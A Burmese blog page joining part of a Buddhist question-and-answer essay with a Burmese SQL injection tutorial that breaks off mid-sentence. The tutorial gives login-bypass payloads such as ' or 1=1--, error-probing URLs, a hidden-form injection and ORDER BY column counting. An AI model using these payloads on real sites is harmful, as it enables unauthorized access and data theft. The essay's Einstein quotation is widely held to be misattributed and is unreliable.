အပါအ၀င္ ဘာသာႀကီးမ်ား အားလံုးဟာ ဂိုဏ္း အမ်ိဳးမ်ိဳး ကြဲခဲ့ၾကပါတယ္။ သို႕ေသာ္လဲ ဗုဒၶဘာသာ ဂိုဏ္းအမ်ိဳးမ်ိဳးဟာ အခ်င္းခ်င္း ဘယ္ေတာ့မွ စစ္ပြဲေတြ မဆင္ႏႊဲခဲ့ၾကပါဘူး။ သူတို႕ဟာ အခ်င္းခ်င္း ဘယ္ေတာ့မွ ရန္မပြါး ခဲ့ၾကပါဘူး။ ခုေခတ္မွာဆိုရင္ ဂိုဏ္းတစ္ဂိုဏ္းရဲ႕ ေက်ာင္းကန္ဘုရားကို တစ္ျခား ဂိုဏ္းတစ္ခုက သြားေရာက္ၿပီး အတူတကြ ဘုရား၀တ္ျပဳၾကပါတယ္။ တျခားဘာသာေရး ေလာကမွာ တကယ္ေတာ့ အလြန္ရွားပါတယ္။
(၁၂) ေမး - သင္က ဗုဒၶဘာသာကို အလြန္ အထင္ႀကီးတာပဲ။ သင္ဟာ သင့္ဘာသာတရားကို မွန္တယ္လို႕ ယူဆၿပီး တျခားဘာသာ အားလံုးကို မွားတယ္လို႕ ယူဆပံုရတယ္။
ေျဖ - ဗုဒၶျမတ္စြာရဲ႕ တရားေတာ္မ်ားကို နားလည္ သေဘာေပါက္တဲ့ ဗုဒၶဘာသာ၀င္ မည္သူမဆို တျခား ဘာသာတရား မွားတယ္လို႕ မထင္ၾကပါဘူး။ တျခားဘာသာတရားမ်ားကို ပြင့္ပြင့္လင္းလင္း ေ၀ဖန္စစ္ေဆးဖို႕ရာ စစ္မွန္တဲ့ လံု႕လ၀ီရိယကို ျပဳသူမွန္သမွ် ဘယ္သူမွ အဲဒီလို မထင္ၾကပါဘူး။ ဘာသာတရား အမ်ိဳးမ်ိဳးကို ေလ့လာတဲ့ အခါမွာ ပထမဆံုး သတိျပဳမိတာကေတာ့ ဒီဘာသာတရား ေတြဟာ အခ်င္းခ်င္း ဘယ္ေလာက္မ်ားမ်ား တူညီၾကတယ္ ဆိုတဲ့ အခ်က္ပါပဲ။ အားလံုးေသာ ဘာသာတရားမ်ားက လူသားရဲ႕ လက္ရွိ အေျခအေနဟာ ေက်နပ္ဖြယ္ မရွိဘူးလို႕ ၀န္ခံၾကတာပါပဲ။ လူသားရဲ႕ အေျခအေန တိုးတက္လိုရင္ စိတ္ေနစိတ္ထား အျပဳအမူ ေျပာင္းလဲဖို႕ လိုအပ္တယ္လို႕ အားလံုးယံုၾကည္ၾကပါတယ္။ ဘာသာတရား အားလံုးဟာ ေမတၱာ၊ က႐ုဏာ၊ ေပးကမ္းလွဴဒါန္းျခင္း၊ လူမႈေရး၊ တာ၀န္၀တ္တရားမ်ား ေဆာင္ရြက္ျခင္း စတဲ့ က်င့္၀တ္မ်ားကို သင္ၾကားေပးၾကပါတယ္။ ဒီဘာသာတရား အားလံုးက အဆံုးစြန္ ျပည့္စံုတဲ့ သေဘာတစ္ခုဟာ ပံုသဏၭာန္ အမ်ိဳးမ်ိဳးနဲ႕ ရွိတယ္ဆိုတာ လက္ခံၾကပါတယ္။ ဘာသာတရားမ်ားက ဒီ လံုး၀အုပ္စံု ျပည့္စံုတဲ့ သဘာ၀ကို ဘာသာစကား အမ်ိဳးမ်ိဳး၊ နာမည္အမ်ိဳးမ်ိဳး၊ အမွတ္အသား အမ်ိဳးမ်ိဳးနဲ႕ ရွင္းလင္း ေဖၚျပၾကပါတယ္။ အရာရာကို တစ္ဘက္သက္ ႐ႈျမင္သံုးသပ္တဲ့နည္းကို အျမင္က်ဥ္းစြာ တြယ္ကပ္ထားၾကတဲ့ အခါမွာသာ သည္းမခံႏိုင္မႈ၊ မာနတရားနဲ႕ ကိုယ္သာမွန္ စိတ္ထားေတြ ျဖစ္ပြါးေပၚေပါက္ လာတတ္ပါတယ္။ စဥ္းစားၾကည့္ပါ။ အဂၤလိပ္၊ ျပင္သစ္၊ တ႐ုတ္၊ အင္ဒိုနီးရွား၊ လူ ၄ ဦး ေကာ္ဖီပန္းကန္ တစ္လံုးကို ၾကည့္ၾကတယ္ ဆိုပါစို႕။ အဲဒီပန္းကန္ကို အဂၤလိပ္က Cup လို႕ေခၚတယ္။
ျပင္သစ္က Tasse လို႕ေခၚတယ္။ တ႐ုတ္က Pei ၊ အင္ဒိုနီးရွားက cawan လို႕ေခၚတယ္။ အဲဒါ သူ႕အေခၚမွန္တယ္၊ တစ္ျခားလူ႕အေခၚ မွားတယ္လို႕ ကိုယ့္အဘိဓာန္ ကိုယ္ ကိုးကားၿပီး အေၾကာက္အကန္
ျငင္းခံုးေနၾကပါေရာ။ အဲဒီအခိုက္မွာ ဗုဒၶဘာသာ၀င္တစ္ဦး ေရာက္လာၿပီး ဘာမွေျပာမေနဘဲ ေကာ္ဖီပန္းကန္ကို ေကာက္ယူၿပီး ေမာ့ေသာက္ျပစ္လိုက္ပါတယ္။ ၿပီးေတာ့မွ သူက ဟိုလူေလးေယာက္ကို ေျပာလိုက္တယ္။ ဒီပန္းကန္ကို ဘယ္လိုပဲ မိတ္ေဆြတို႕ေခၚေခၚ လိုရင္းက ဒါကို ေကာ္ဖီေသာက္ဖို႕ အသံုးျပဳတာပါပဲ၊
ျငင္းခံုေနလို႕ ဘာအက်ိဳးရွိမလဲ၊ ေသာက္ဖို႕ပန္းကန္ကို ေသာက္လိုက္မွ
အေမာေျပၿပီး လန္းဆန္းလာမွာေပါ့၊ အဲဒါ လိုရင္းပဲ။ ဒါဟာ ဘာသာတရားမ်ားအပၚ ဗုဒၶဘာသာက ျမင္တဲ့ အျမင္၊ ထားတဲ့ စိတ္ထားပါပဲ။
(၁၃) ေမး - ဗုဒၶဘာသာဟာ သိပၸံနည္း က်ပါသလား။
ေျဖ - ဒီအေမးကို မေျဖမီ သိပၸံ ဆိုတဲ့ စကားလံုးရဲ႕ အဓိပၸါယ္ကို ရွာၾကည့္တာ အေကာင္းဆံုး ျဖစ္ပါလိမ့္မယ္။ အဘိဓာန္မ်ားက ဒီလိုဖြင့္ျပၾကပါတယ္။ "သိပၸံ" ဆိုတာ တကယ္ျဖစ္ေနတဲ့ သဘာ၀တစ္ခုကို လက္ေတြ႕မ်က္ျမင္ ၾကည့္႐ႈျခင္းႏွင့္ စမ္းသပ္ျခင္းတို႕အေပၚ အေျခခံၿပီး စနစ္တစ္ခု ေဖာ္ထုတ္တဲ့ပညာ၊ တိတိက်က် ေလ့လာစမ္းသပ္ သိရွိထားတဲ့ အရာတစ္ခုနဲ႕ ပတ္သက္လို႕ သဘာ၀က်တဲ့ နည္းလမ္း ဥပေဒသမ်ား သတ္မွတ္ေဖၚျပတဲ့ ပညာပါပဲ။ အဲဒီပညာရဲ႕ အစိတ္အပိုင္း တစ္ခုခုလဲ သိပၸံပါပဲ။ ဗုဒၶဘာသာမွာ ဒီဖြင့္ဆိုခ်က္နဲ႕ မကိုက္ညီတဲ့ အခ်က္အလက္မ်ား ရွိေကာင္း ရွိႏိုင္ပါတယ္။ သို႕ေသာ္လဲ ဗုဒၶဘာသာရဲ႕ လိုရင္း တရားျဖစ္တဲ့ သစၥာေလးပါးကေတာ့ ေသေသခ်ာခ်ာ ကိုက္ညီပါတယ္။
ပထမဆံုး အမွန္တရားက ဒုကၡသစၥာပါ။ ဒီမွာ ဆင္းရဲျခင္းဆိုတာ ကိုယ္တိုင္ေတြ႕သိ ခံစားရတဲ့ အရာပါ။ သူ႕ကို အဓိပၸါယ္ သတ္မွတ္လို႕လဲ ရပါတယ္။ လက္ေတြ႕ ခံစားသိျမင္လို႕လဲ ရပါတယ္။
ဒုတိယ အမွန္တရားက သမုဒယသစၥာပါ။ လိုခ်င္တပ္မက္မႈ တဏွာကို ဆိုလိုပါတယ္။ ဆင္းရဲဒုကၡကို ျဖစ္ေပၚေစတဲ့ အေၾကာင္းျဖစ္တဲ့ ဒီတဏွာဟာလဲ ကိုယ္တိုင္ ေတြ႕သိ ခံစားရတဲ့ အရာပါ။ အဓိပၸါယ္ သတ္မွတ္လို႕လဲ ရတယ္။ လက္ေတြ႕ ခံစား သိျမင္လို႕လဲ ရပါတယ္။ ဒီဒုကၡနဲ႕ ဒုကၡရဲ႕ အေၾကာင္းတရား အမွန္ကို ဒႆနပညာဆိုင္ရာ စကားလံုးေတြနဲ႕ ရွင္းျပဖို႕ မလိုပါဘူး။ ကိုယ္ေတြ႕ ခံစားသိျမင္ရတဲ့ အရာေတြပါ။
တတိယ အမွန္တရားကေတာ့ နိေရာဓသစၥာပါ။ ဆင္းရဲကုန္ဆံုးတဲ့သေဘာ၊ ဆင္းရဲၿငိမ္းတဲ့သေဘာပါ။ ဒီသေဘာကို အနႏၲ တန္ခိုးရွင္ဆိုသူ တစ္ဦးဦးကို အားကိုးလို႕ မရပါဘူး။ ယံုၾကည္႐ံုမွ် ဆုေတာင္႐ံုမွ်နဲ႕လဲ မရႏိုင္ပါဘူး။ ဆင္းရဲဒုကၡရဲ႕ အေၾကာင္းတရားကို ပယ္သတ္ႏိုင္မွပဲ ရပါတယ္။
စတုတၳ အမွန္တရားကေတာ့ ဆင္းရဲၿငိမ္းေစတဲ့ နည္းလမ္းျဖစ္တဲ့ မဂၢသစၥာပါ။
ဒီဆင္းရဲၿငိမ္းေရး နည္းလမ္းကလဲ ဒႆနပညာ သေဘာတရားေတြနဲ႕ လံုး၀ မသက္ဆိုင္ ပါဘူး။ သတ္မွတ္ေပးထားတဲ့ နည္းလမ္းအတိုင္း လက္ေတြ႕ က်င့္မွပဲ ရပါတယ္။ ဒီနည္းလမ္းကလဲ အစမ္းသပ္ခံ နည္းလမ္းပါ။ သိပၸံပညာမွာလိုပဲ ဗုဒၶဘာသာကို ရွင္းျပဖို႕လဲ အနႏၲ တန္ခိုးရွင္ အယူအဆကို လက္ခံဖို႕ မလိုပါဘူး။ ဗုဒၶဘာသာ ကိုယ္တိုင္က စၾကာ၀ဠာ ကမၻာေလာႀကီးရဲ႕ အလုပ္လုပ္ပံုကို သဘာ၀ နိယာမေတြနဲ႕ ရွင္းျပထားပါတယ္။ ဒီအခ်က္ အားလံုးက ဗုဒၶဘာသာရဲ႕ သိပၸံနည္းက် အႏွစ္သာရကို ေသခ်ာစြာ ေဖၚေဆာင္ ေနပါတယ္။ ဒီမွာလဲ ကြၽႏု္ပ္တို႕ ဗုဒၶျမတ္စြာ အၿမဲတေစ ဆံုးမခဲ့တဲ့ အဆံုးအမက ကြၽႏု္ပ္တို႕ဟာ ဘယ္အရာကိုမဆို အကန္းယံု အရမ္းယံု မယံုမိၾကဖို႕၊ ေမးျမန္း၊ စံုစမ္း၊ စစ္ေဆး၊ စမ္းသပ္ၿပီးမွ ကိုယ္တိုင္ ေတြ႕သိခံစားရတဲ့ အရာေပၚမွာ အေျခခံၿပီး ယံုသင့္မွ ယံုဖို႕ပါပဲ။ ဒီအဆံုးအမမွာ တိက်တဲ့ သိပၸံနည္းက် အျမင္ ပါ၀င္ေနပါတယ္။
ရွင္ေတာ္ျမတ္ဘုရား ဆံုးမပံုက -
ဗ်ာဒိတ္စကား ဆို႐ံုနဲ႕ မယံုၾကည္ပါႏွင့္ အစဥ္အဆက္ ယံုၾကည္လက္ခံလာတာ
ျဖစ္႐ံုႏွင့္ မယံုၾကည္ပါႏွင့္။ သတင္းၾကားနဲ႕လဲ မယံုၾကည္ပါႏွင့္
ျမင့္ျမတ္တဲ့ က်မ္းစာမ်ားမွာ ပါ႐ံုနဲ႕လဲ မယံုၾကည္ပါႏွင့္
တဆင့္ စကားမွ်ႏွင့္လဲ မယံုၾကည္ပါႏွင့္ စဥ္းစားေတြးေခၚေရး တကၠေဗဒ၊
ဒႆနိကေဗဒေတြနဲ႕ ကိုက္ညီ႐ံုမွ်ႏွင့္လဲ မယံုၾကည္ပါႏွင့္
ေျပာတဲ့လူက ယံုၾကည္ထိုက္တဲ့ ပုဂၢိဳလ္ ျဖစ္႐ံုမွ်ႏွင့္လဲ မယံုၾကည္ပါႏွင့္
မိမိဆရာ ျဖစ္႐ံုမွ်ႏွင့္လဲ မယံုၾကည္ပါႏွင့္
သင္ကိုယ္တိုင္ ေကာင္းတဲ့အရာပဲ၊ အျပစ္ကင္းတဲ့ အရာပဲ၊ ပညာရွိတို႕ ခ်ီးမြမ္းအပ္တဲ့ အရာပဲ၊ လက္ေတြ႕ က်င့္ၾကည့္တဲ့ အခါမွာလဲ မုခ် ခ်မ္းသာေစႏိုင္တဲ့ အရာပဲလို႕ ကိုယ္ေတြ႕ သိျမင္ရတဲ့ အခါက်မွပဲ အဲဒါကို ယံုၾကည္ လက္ခံ လိုက္နာ က်င့္ၾကံပါ။
ဒါေၾကာင့္ ဗုဒၶဘာသာဟာ ျပည့္ျပည့္၀၀ သိပၸံ နည္းက်တယ္လို႕ မဆိုႏိုင္ေသာ္လဲ အေတာ္ ခိုင္မာတဲ့ သိပၸံနည္းက် သေဘာသဘာ၀ေတြေတာ့ ပါ၀င္ပါတယ္။ ၿပီးေတာ့ တျခား ဘာသာတရားေတြထက္ ပိုၿပီးသိပၸံ နည္းက်တယ္လို႕ေတာ့ ေျပာႏိုင္ပါတယ္။
ႏွစ္ဆယ္ရာစုႏွစ္မွာ အႀကီးျမတ္ဆံုး သိပၸံပညာရွင္ ျဖစ္တဲ့ အဲလ္ဘတ္အိုင္းစတိုင္း က ဗုဒၶဘာသာနဲ႕ ပတ္သက္လို႕ ဒီလိုေျပာပါတယ္။
ေနာင္တစ္ခ်ိန္မွာ စၾက၀ဠာ တစ္ခုလံုး ကိုးကြယ္ၾကတဲ့ ဘာသာတရားတစ္ခု ျဖစ္ေပၚလာလိမ့္မယ္။ အဲဒီဘာသာတရားဟာ ထာ၀ရဘုရား အယူအဆကို လႊမ္းမိုးသြားလိမ့္မယ္။ တယ္ တရားေသ ၀ါဒကိုလဲေရွာင္လႊဲႏိုင္ လိမ့္မယ္။ သဘာ၀တရားႏွင့္ ဘာသာတရား ႏွစ္ခုလံုးကို လႊမ္းျခံဳမိတဲ့ ဒီဘာသာတရားဟာ ႐ုပ္နာမ္ႏွစ္ပါးလံုး ကိုယ္ေတြ႕ ခံစား သိျမင္မႈနဲ႕ အဓိပၸါယ္ ျပည့္၀တဲ့ ေပါင္းစည္း ညီၫြတ္မႈေပၚမွာ အေျခခံလိမ့္မယ္။ ဒီအခ်က္ေတြကို ဗုဒၶဘာသာက အေျဖေပးလိမ့္မယ္။ တကယ္လို႕သာ ေခတ္သစ္ သိပၸံနည္းက် လိုအပ္ခ်က္မ်ားကို ျဖည့္ဆည္းေပးႏိုင္တဲ့ ဘာသာတရားတစ္ခု ရွိတယ္ဆိုရင္ အဲဒီ ဘာသာတရားဟာ ဗုဒၶဘာသာပဲ ျဖစ္လိမ့္မယ္။
Ref: FaceBook
Saturday, July 28
SQL Injection သုိ႔မဟုတ္ Hacker ေတြရဲ႕ တုိက္ကြက္ဆန္းတစ္ခု
အရင္ဘေလာ့မွာနဲ႕ MMITD မွာ တင္ဖူးပါတယ္
ခု မသိသူေတြအတြက္ ထပ္မံတင္ေပးတာပါ
--- မိတ္ဆက္---
Injection နဲ႔ပက္သက္တဲ႔အပုိင္းကုိ အေတြ႔အၾကံဳ မရင့္က်က္ေသးတဲ႔သူေတြ၊ အေတြ႔အၾကံဳရွိၿပီးတဲ႔သူေတြပါ နားလည္ႏုိင္ေအာင္ ကၽြန္ေတာ့္ရဲ႕ အၿမင္နဲ႔ နဲနဲေလာက္ Tutorial တစ္ခုအၿဖင့္ေရးသားလုိက္ပါတယ္။ SQL injectiong နဲ႔ပက္သက္တဲ႔ Tutorial ေတြကုိ Google မွာ ရွာၾကည့္လုိက္ပါက ေတာင္လုိပုံေနပါတယ္။ အားလုံးကေတာ့ အတူတူပါပဲ... SQL injector ေတြၿဖစ္ေစရန္တစ္ခုအတြက္မဟုတ္ပဲ SQL Injection နဲ႔အတူ php နဲ႔ mysql functions ေလးေတြကုိ သိကာ security ပုိင္းကုိ ထိန္းသိန္းကာကြယ္ႏုိင္ရန္အတြက္ ရည္ရြယ္၍ Computer ေ၀ါဟာရကုိ ၿမန္မာလုိ တုိက္ရုိက္ဘာသာၿပန္ရတာ နဲနဲေတာ့ နားရႈပ္သြားႏုိင္မယ္။ ဒါေပမဲ႔ အတတ္ႏုိင္ဆုံးေတာ့ နားလည္ေအာင္ ရွင္းၿပေပးလုိက္ပါတယ္။ SQL Injection ကုိေလ့လာတဲ႔အခါမွာ အေၿခခံ Web Developement ပုိင္းအေၿခခံရွိဖု႔ိေတာ့လိုပါလိမ့္မယ္.. ဒီ tutorial အတြက္ လုိအပ္တာကေတာ့ php နဲ႔ sql အေၾကာင္းသိထားရင္ နားလည္ေလာက္ပါတယ္။
---DATABASE ဆိုတာဘာလဲ?---
ရုိးရုိးရွင္းရွင္းပါပဲ... Database ဆုိတာဘာလဲဆုိရင္ Database ဆုိတာ အခ်က္အလက္ Data ေတြစုစည္းသိမ္းဆည္းထားတဲ႔ Application တစ္ခုပါပဲ... Application Programming Interface (API) ေတြကုိ တည္ေဆာက္ အသုံးၿပဳမယ္ ထိန္းသိမ္း သိမ္းဆည္းထားမယ္။ Database(DB) servers ေတြဟာ Web development လုပ္ငန္းေတြ နဲ႔လည္း ေပါင္းစည္းအသုံးၿပဳလုိ႔ရတဲ႔အတြက္ ၄င္းအထဲက data ေတြကုိ ထုတ္ယူအသုံးၿပဳ၊ ၾကည့္ရႈ႕ဖုိ႔ဆုိတာ ခက္ခဲ႔တဲ႔ကိစၥတစ္ခုေတာ့မဟုတ္ပါဘူး။ Database အထဲမွာ usernames, passwords စသည္ ေတြလုိ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိလည္း သိမ္းဆည္းႏုိင္တာ ၿဖစ္တဲ႔အတြက္ Database ရဲ႕ လုံၿခံဳေရးဟာလည္း အလြန္ကုိအေရးၾကီးပါတယ္။ ထိန္းသိမ္းမႈ ညံ့ဖ်င္းတဲ႔ database တစ္နည္းအားၿဖင့္ အမွတ္တမဲ႔ၿဖစ္ေစ၊ သတိမမႈ၍ေသာ္လည္းေကာင္း၊ အေၾကာင္းေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင့္ programmer ေတြေရးသားထားတဲ႔ code ေတြရဲ႕ လြဲမွားမႈေတြ ေၾကာင့္ ဒီလုိဟာကြက္ေတြ ၿဖစ္ေပၚကာ database ထဲကုိ အၿခား တရားမ၀င္ ၀င္ေရာက္သူတုိ႔အား လမ္းဖြင့္ေပးသလုိၿဖစ္သြားတတ္ပါတယ္။ DB servers ေတြအမ်ားၾကီးရွိတဲ႔အထဲမွာ ဒါေလးေတြက အသုံးမ်ားတာေလးေတြပါ။
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open source),
SQLite စသည္ေပါ႔...
Database ရဲ႕ တည္ေဆာက္ပုံေလးကုိ ၿမင္ႏုိင္ေအာင္လုိ႔ ဇယားေလးနဲ႔ၿပထားတာပါ။
--- SQL INJECTION ဆုိသည္မွာ?---
SQL injection ဆုိတာကေတာ့ ယေန႔ေခတ္ အင္တာနက္စာမ်က္ႏွာေပၚမွာ အၿဖစ္အမ်ားဆုံး web application အမွားၿဖစ္ပါတယ္။ ၄င္း web application အမွားတစ္ခုမွေန၍ တရားမ၀င္ ၀င္ေရာက္အသုံးၿပဳသူေတြ (Hackers) က မိမိတုိ႔ရဲ႕ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိ ခုိးယူသြားႏုိင္ပါတယ္။ ဒါေၾကာင့္ SQL injection ဆုိတာ web or db server တုိ႔ရဲ႕ အမွားေၾကာင့္မဟုတ္ပဲ အေတြ႔အၾကံဳမ့ဲ၊ အေရအခ်င္း ည့ံဖ်င္းတဲ႔ programming ေရးဆြဲသူေတြေၾကာင့္သာၿဖစ္ပါတယ္။ ဒီနည္းလမ္းက အေ၀းတစ္ေနရာကေန application, web server ကုိ အလြယ္ ကူဆုံးထိန္းခ်ဳပ္ႏုိင္ပါတယ္။ ဒီ SQL injection မွာ ပုံစံအမ်ဳိးမ်ဳိးေသာ SQL commands ေတြ နဲ႔ web page ကေန အမ်ဳိးမ်ဳိးေသာ data ေတြကို ထုတ္ယူႏုိင္ပါတယ္။
ဥပမာတစ္ခုအေနနဲ႔ေၿပာမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔က Company တစ္ခုရဲ႕ Network တစ္ခုကုိ၀င္ေရာက္ေတာ့မယ္ဆုိရင္ port scanner ေတြနဲ႔ sanner ဖတ္ၿပီး အမွားေတြနဲ႕ ပြင့္ဟေနတဲ႔ port ကေန ၀င္ေရာက္သြားႏုိင္ပါတယ္။ ဒါေပမဲ႔လည္း အင္တာနက္နဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ Web Server (Host Sever) တစ္ခုက port 80 ေလာက္ပဲဖြင့္မယ္၊ တစ္ၿခား security ပုိင္းေတြ ေပးထားမယ္ဆုိရင္ port scanner ဘယ္ေလာက္ေကာင္းေကာင္း အလုပ္ၿဖစ္မွာမဟုတ္ပါဘူး၊ ၀င္ေရာက္ဖုိ႔ခက္သြားပါလိမ့္မယ္( ခက္ခဲေနမယ္ )... ဒါဆုိရင္ Web Hacking ကုိ ဦးတည္ၿပီးေၿပာင္းၾကည့္ရပါလိမ့္မယ္... Web Hacking လုိ႔ေၿပာရင္ ေတာ္ေတာ္မ်ားမ်ားကေတာ့ SQL Injection ကုိပထမဦးစြာေၿပးၿမင္ၾကမွာပါပဲ... ဟုတ္တယ္ေလ.. SQL Injection ကတစ္ၿခားဘာမွမလုိဘူး Web Browser တစ္ခုပဲလုိတယ္...
---ေရွာင္ကြင္း ၀င္ေရာက္ၿခင္း---
Site ေတြမွာ username, password ေတြနဲ႔ login ၀င္ခုိင္းတယ္ဆုိတာ site အထဲမွာ ရွိတဲ႔ content ေတြကုိ မွတ္ပုံတင္ထားတဲ႔သူ (username & password ရွိထားတဲ႔သူ) ေတြကုိသာ ၾကည့္ရႈအသုံးၿပဳခြင့္ေပးထားတာပါ။ အကယ္၍ မိတ္ေဆြက username & password မရွိပဲ ရွိသကဲ႔သုိ႔ ၀င္ေရာက္အသုံးၿပဳမယ္ (user registration မလုပ္ပဲ ၀င္ေရာက္တယ္) ဆုိရင္ ဒါကုိ BYPASSING LOGINS လုပ္တယ္လုိ႔ေခၚပါတယ္။ ဒါကေတာ့ programmer ရဲ႕ login မွာစီစစ္မႈ မေသခ်ာလုိ႔ ၿဖစ္တဲ႔အတြက္ ကံေကာင္းေထာက္မစြာနဲ႔ User name နဲ႔ Password ကုိမသိပဲ login ၀င္လုိ႔ရသြားပါလိမ့္မယ္။
ဥပမာတစ္ခုအေနနဲ႔ ၾကည့္မယ္ဆုိရင္ username က admin ၿဖစ္ၿပီး password က 12345 ဆုိၾကပါစုိ႔... ဒါဆိုရင္ SQL query က
SELECT USER from database WHERE username='admin' AND password='12345' ဆုိၿပီးၿဖစ္သြားပါလိမ့္မယ္..... အကယ္၍ အေပၚ SELECT command တန္ဖုိးက မွန္တယ္ဆုိရင္ site ထဲကုိ ၀င္ခြင့္ၿပဳမွာၿဖစ္ပါတယ္။ အကယ္၍ အထက္ပါေၿပာခဲ႔သလုိ programmer က login မွာမွန္ကန္တဲ႔စီစစ္မႈမရွိရင္ Hacker ေတြက ေအာက္ပါအတုိင္း ၀င္ေရာက္သြားႏုိင္ပါတယ္။
username:a or 1=1--
password:blank
SQL query မွာေတာ့
SELECT USER from database WHERE username='a' or 1=1-- AND password=''
ဒါက comment operator ပါ အဲ႔လုိပဲ အၿခား comment operator က /* ၿဖစ္ပါတယ္။
SELECT USER from database WHERE username='a' or 1=1
1=1 က အၿမဲတန္း query ကုိ true ၿဖစ္ေစၿပီး OR ကေတာ့ query တစ္ခုက true ၿဖစ္တဲ႔အတြက္ အၿခားတစ္ခုကုိလည္း true ၿဖစ္သြားေစပါတယ္ဒါေၾကာင့္ 'a' ဆုိတဲ႔ user ဟာ DB မွာမရွိေတာင္မွ ဒီ query က true ၿဖစ္ကာ site admin ကို၀င္ေရာက္ခြင့္ေပးသြားပါလိမ့္မယ္... ဒီလုိနည္းနဲ႔ Vulnerable ၿဖစ္တဲ႔ site ေတြအတြက္ ေအာက္ပါအတုိင္း စမ္းစစ္ႏုိင္ပါေသးတယ္...
username:' or 1='1 password:' or 1='1
username:' or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1
--- လ်ဳိ႕၀ွက္ထားေသာ Data မ်ားကုိ ၀င္ေရာက္အသုံးၿပဳၿခင္း---
SQL injection က အခုလုိ bypassing logins တစ္ခုတည္းမဟုတ္ပဲ DB servers ကေန လ်ဳိ႕၀ွက္စြာသိမ္းဆည္းထားတဲ႔ Data ေတြကုိ ရယူႏုိင္ပါတယ္... အနည္းငယ္ရႈပ္ေထြးေနမွာၿဖစ္တဲ႔အတြက္ နဲနဲေလး အထူးဂရုၿပဳၿပီးေတာ့ ေလ့လာၾကည့္ပါ။ ေအာက္ပုိင္းမွာ လက္ေတြ႔စမ္းလုိ႔ရေအာ္ site link နဲ႔ တကြ ေဖာ္ၿပေပးထားပါတယ္။
---အားနည္းခ်က္ အမွားမ်ား ရွာေဖြစစ္ေဆးၿခင္း---
Site တစ္ခုကုိရွာလုိက္မယ္...
In PHP ==>>
www.site.com/article.php?id=5
id variable assign လုပ္ထားတဲ႔ ေနာက္နားက ' (apostrophe) ေလးတစ္ခုကုိ ထည့္လုိက္ပါမယ္..
www.site.com/article.php?id=5'
ဒီလုိလုိ စမ္းတဲ႔ေနရာမွာ
Integer Based
www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
www.site.com/script.php?param=%
www.site.com/script.php?param=36'a
String Based
www.site.com/script.php?param=Text'--
www.site.com/script.php?param=Te'+'xt
www.site.com/script.php?param=Tex%
ဆုိၿပီးရွိပါတယ္.. အဆင္ေၿပသလုိ စမ္းသပ္ႏုိင္ပါတယ္...
အကယ္၍ ၄င္းရဲ႕ site က vulnerable မၿဖစ္ဘူးဆုိရင္ ပုံမွန္အတုိင္း page loading လုပ္သြားပါလိမ့္မယ္..
အဲ႔လုိမဟုတ္ပဲ query string filtering မရွိဘူးဆုိရင္ "MySQL Syntax Error By '5'' In Article.php on line 15." သုိမဟုတ္ Check the correct MySQL version သုိ႔မဟုတ္ MySQL Fetch error သုိ႔မဟုတ္ပါက ဘာမွမေပၚပဲ page အၿဖဴၾကီးသာေပၚေနပါလိမ့္မယ္... ဒါဆုိရင္ ဒီ site က vulnerable ၿဖစ္ေနပါတယ္ အကယ္၍ ' ၿဖင့္ မရလွ်င္ ေအာက္ပါအတုိင္း union select 1-- ဆုိတာကုိသုံးႏုိင္ပါတယ္။
www.site.com/article.php?id=5 union select 1--
In ASP ==>>
အထက္ပါနည္းအတုိင္း
http://www.site.com/index.asp?id=5
ဆုိရင္ ေနာက္က ' (apostrophe) ေလးထည့္ၿပီးစမ္းႏုိင္ပါတယ္။
http://www.site.com/index.asp?id=5'
ဒါဆုိရင္
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
ဆုိတဲ႔ error မ်ဳိးေပၚေနတတ္ၿပီး ASP, JSP, CGI, နဲ႔ PHP web pages ေတြမွာ စမ္းသပ္ႏုိင္ပါတယ္။
အကယ္၍ URL မွာ မေပၚတဲ႔ parameters မ်ဳိးဆုိရင္ ၄င္းတုိ႔ရဲ႕ login page, search page, feedback လုိေနရာမ်ဳိးေတြက ရွာႏုိင္ပါတယ္.. တစ္ခ်ဳိ႕ html page ေတြက POST command နဲ႔ ASP page ကုိ ပုိ႔ေဆာင္ေပးတဲ႔ parameters သုံးထားတတ္ပါတယ္.. ဒါဆုိရင္ေတာ့ ၄င္းတုိ႔ရဲ႕ HTML source code ထဲကုိ ၀င္ေရာက္ပါ။ ၿပီးရင္ "FORM" tag ကုိရွာလုိက္ပါ ... ဥပမာ
span class="tags">FORM action=Search/search.asp method=post>
span class="tags">input type=hidden name=A value=C>
span class="tags">/FORM>
ဒီ span class="tags">FORM>span class="tags">/FORM> ႏွစ္ခုၾကားက ၿဖစ္ႏုိင္ေၿခေတြပါ။
span class="tags">FORM action=http://duck/Search/search.asp method=post>
span class="tags">input type=hidden name=A value='a' or 1=1--">
span class="tags">/FORM>
value မွာ အေပၚကအတုိင္း BYPASSING LOGINS မွာသုံးသလုိ စမ္းသပ္ၿပီးရွာေဖြႏုိင္ပါတယ္။
---Columns အေရအတြက္ရွာေဖြၿခင္း---
‘order by’ ကုိအသုံးၿပဳၿပီး Columns မ်ားကုိ ရွာေဖြမွာၿဖစ္ပါတယ္..
URL query ကုိေအာက္ပါတုိင္း ရုိက္ထည့္လုိက္ပါမယ္... '/*' သုိ႔မဟုတ္ '--" ဆုိတာေလးသုံးလုိ႔ရပါတယ္..
www.site.com/article.php?id=5 order by 1/*
အမွားမေပၚဘူးဆုိရင္ ေနာက္တစ္ခါ 2 ဆုိၿပီးတုိးကာ ရုိက္ထည့္ပါမယ္
www.site.com/article.php?id=5 order by 2/*
ယခုအခ်ိန္အထိ အမွားမေပၚေသးဘူးဆုိရင္ ေနာက္တစ္ ထပ္ၿပီးတုိးပါမယ္.. ဒီလုိတုိးတုိးၿပီး အမွားေပၚလာတဲ႔အထိ ရွာေဖြရမွာၿဖစ္ပါတယ္...
www.site.com/article.php?id=5 order by 3/*
အခု 3 ကုိေရာက္တဲ႔အခါ အမွားေတြ႔တယ္ဆုိရင္
